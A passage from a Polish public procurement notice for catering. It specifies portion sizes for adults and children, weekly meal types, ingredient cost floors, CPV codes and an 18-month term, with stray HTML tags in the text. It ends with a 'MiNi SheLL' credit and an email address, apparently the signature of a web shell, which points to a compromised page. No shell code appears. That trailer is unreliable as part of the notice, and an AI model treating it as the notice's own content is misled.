Przy przygotowywaniu posiłków uwzględnić należy zalecaną wartość energetyczną oraz
uwzględnić normy produktów każdej z grup.
1.5	Wartość jednego gorącego posiłku będzie tożsama z podaną przez Wykonawcę usługi ofertową ceną jednostkową obiadu dwudaniowego.
1.6	Zamawiający dopuszcza możliwość dostarczenia w każdym tygodniu:
1)	jednego posiłku bezmięsnego;
2)	jednego posiłku na bazie mięsa mielonego;
3)	jednego posiłku z ryby;
o określonej gramaturze posiłków dla dorosłych:
1)	zupa - minimum 0,5 litra;
2)	ziemniaki, kasza, ryż, makaron (do wyboru) - minimum 250 gram;
3)	mięso, ryby - minimum 150 gram;
4)	surówka - minimum 300 gram;
oraz dla dzieci:
1)	zupa minimum 0,3 litra;
2)	ziemniaki, kasza, ryż, makaron ( do wyboru) - minimum 150 gram;
3)	mięso, ryby - minimum 60 gram;
4)	surówka - minimum 90 gram.
1.7	Oferowane posiłki muszą być wysokiej jakości, zarówno co do wartości odżywczej, gramatury, jak i estetyki oraz muszą uwzględniać polską tradycję kulinarną.
1.8	Oferowany asortyment potraw musi być pełnowartościowy pod względem odżywczym oraz
urozmaicony w sposób zapewniający różnorodność i niepowtarzalność w okresie
dziesięciodniowym.
1.9	Zamawiający wymaga, aby surowcowy,  tzw. - wsad do kotła - umożliwiał wyprodukowanie dwudaniowego obiadu, z uwzględnieniem wymogów niniejszej specyfikacji, nie był niższy niż   5 zł brutto dla dorosłych i 4 zł brutto dla dzieci, licząc w cenach hurtowych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.32.10.00-6, 55.52.00.00-1, 55.52.40.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 18.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com